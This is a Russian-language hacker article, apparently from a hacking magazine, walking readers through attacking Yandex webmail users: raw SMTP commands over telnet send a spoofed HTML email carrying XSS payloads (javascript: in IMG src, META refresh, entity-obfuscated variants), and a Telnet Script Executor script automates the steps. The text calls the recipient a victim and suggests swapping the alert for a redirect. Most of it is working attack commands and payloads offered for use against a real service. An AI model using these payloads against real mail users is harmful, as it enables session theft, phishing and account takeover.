Дарова, любители побаловаться чужим мылом. На этот раз мы покопаемся на
YANDEX.RU… Катят все способы, что и на MAIL.RU (см. прошлую
статью), но не будем повторятся, а возьмемся за дело по новому. 

Какой прекрасный сервак! На этот раз нашим орудием станет телнет, надеюсь ты с
ним знаком 🙂 Идея такова: мы отсылаем письмо без аттача,
с измененным полем Content-Type в сообщении, средствами SMTP протокола. Итак, запускаем telnet,
набиваем следующее: 

open smtp.yandex.ru 25 
helo my_enemy 
mail from: <digitalscream@userline.ru> 
rcpt to: <i_need_this_mail@yandex.ru> 
data 

Вместо i_need_this_mail@yandex.ru пропишешь нужное мыло.
А теперь и сама замена типа документа (точку надо ввести при завершении ввода тела документа):

Mime-Version: 1.0 
Content-Type: TEXT/HTML; charset=US-ASCII 
Subject: Message Possible virus infected 🙂 

После чего сама мессага сама станет хтмл’ом. А значит можем прописать скрипты.
Тут все намного проще и ты можешь вставить в
письмо типичные конструкции. Я выбрал: 

<IMG src=»https://xakep.ru/wp-content/uploads/post/15653/javascript:java_script»> 

Значит продолжаем вводить тело письма: 

<IMG src=»https://xakep.ru/wp-content/uploads/post/15653/javascript:alert(‘I’m JavaScript!’);»> 

И наконец: 

quit 

Но вместо выскакивающего окна ты можешь накодить редирект.
Но так сложилось, что в нашей жизни самое главное автоматизация, ведь нервы
сдают после n-ой ошибки. И тем более, если ты сделаешь ошибку в письме своей
жертве, то твои шансы падают к нулю. Я советую использовать
какие-нибудь программы автоматизации. Я использовал
Telnet Script Executor, она старенькая, еще под ДОС, но
надежная 🙂 Ее скрипт в данном случае бедет выглядеть так: 

open smtp.yandex.ru 25 
pause 10 
transmit «helo my_enemy^M» 
pause 7 
transmit «mail from: <digitalscream@userline.ru>^M» 
pause 10 
transmit «rcpt to: <i_need_this_mail@yandex.ru>^M» 
pause 7 
transmit «data^M» 
pause 10 
transmit «Mime-Version: 1.0^M» 
pause 2 
transmit «Content-Type: TEXT/HTML; charset=US-ASCII^M» 
pause 2 
transmit «Subject: Message Possible virus infected :-)^M» 
pause 2 
transmit «<IMG src=»https://xakep.ru/wp-content/uploads/post/15653/javascript:alert(‘I’m JavaScript!’);»>^M» 
pause 2 
transmit «.^M» 
pause 10 
close 

Сохраняем это дело в файл, например yandex_fuck.dat, а потом запускаем: 

TSE -d<yandex_fuck.dat 

Но никто не мешает тебе написать свою прогу, мне по крайней мере хватило этой. Вот еще один интересный способ прописать яву, нашел случайно методом научного
тыка: 

<META HTTP-EQUIV=»Refresh» content =»4; URL=javascript:alert(‘hello’)»> 

или тоже самое используя юникод: 

<META HTTP-EQUIV=»Refresh» content =»4;URL=&#74ava&#83cript:alert(‘hello’)»> 

Ну вот на сегодня хватит, по кифирчику и спать :)) 

P.S.: Достали просить сломать чье-то мыло! Я этим не занимаюсь… Я… я пошел
спать 🙂

Оставить мнение

Check Also

Атака NFCdrip использует NFC для передачи данных на сравнительно дальние дистанции

Исследователь продемонстрировал, что NFC можно использовать в преступных целях и на сравни…